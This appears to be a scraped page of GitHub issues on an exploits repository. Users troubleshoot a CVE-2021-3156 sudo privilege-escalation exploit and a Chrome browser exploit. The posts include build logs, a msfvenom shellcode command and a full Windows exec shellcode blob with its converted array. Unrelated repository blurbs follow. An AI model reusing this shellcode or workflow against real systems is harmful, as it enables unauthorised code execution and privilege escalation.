r4j0x00 / exploits Goto Github PK
View Code? Open in Web Editor NEWLicense: BSD 2-Clause "Simplified" License
License: BSD 2-Clause "Simplified" License
The one shot exploit doesnt work on
Linux lite
sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4094 is owned by uid 1000, should be 0
sudoedit: no password was provided
sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4095 is owned by uid 1000, should be 0
sudoedit: no password was provided
Failed
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Linux Lite 5.2"
VERSION_ID="20.04"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Running Sudo version 1.8.31
and it created all of these folder on the desktop too.
Chrome gives the following.
Error code: STATUS_ACCESS_VIOLATION
Version 85.0.4183.83 (Official Build) (64-bit)
I'm trying to replace in POC calc.exe with cmd.exe. I'm generating shellcode using msf:
msfvenom -p windows/x64/exec CMD = 'cmd.exe'
Then convert shellcode with convert_shellcode.js but when I execute the exploit.html, it's not work. How exactly do i need to generate shellcode for cmd.exe?
thanks.
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ make
gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:75:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
execve(argv[0], argv, env);
^~~~~~
mkdir libnss_X
gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ ./exploit
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ uname -a
Linux debian-buster.*** 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$
Hello,
I'm trying to execute the CVE-2021-3156 exploit and can't succed to it.
I'm getting a lot of "sudoedit: [...] : editing files in a writable directory is not permitted"
Have you any clue why it's not working here ?
Thanks
why is the for loop exactly 1000, does it just have to be >a lot< (maybe depending on how beefy the system it's running on is)?
I use msf create shellcode shellcode=\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00
then convert shellcode with convert_shellcode.js and replace the shellcode in exploit.js
Uint32Array(49) =[8579324, 2304770048, 1690317285, 2335199371, 1384844370, 678595348, 642430735, 1017970481, 738360417, 231719200, 4074948353, 1384863570, 1011518224, 2014399627, 3506522339, 542739281, 1233900289, 1228595992, 25900171, 2902405590, 17682369, 1977628871, 4168942582, 1965325627, 1485527268, 1725104420, 2336951435, 3540065368, 25887883, 608471504, 1633377060, 4283521625, 1516199904, 2380993163, 2365680221, 45701, 828919808, 4287065995, 3052452821, 2791855778, 4288527765, 2080783573, 3774578698, 1203438965, 1785688595, 3590279936, 1668047203, 1702389038, 2425393152]
but when I execute the exploit.html in chrome, it's not successfull
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.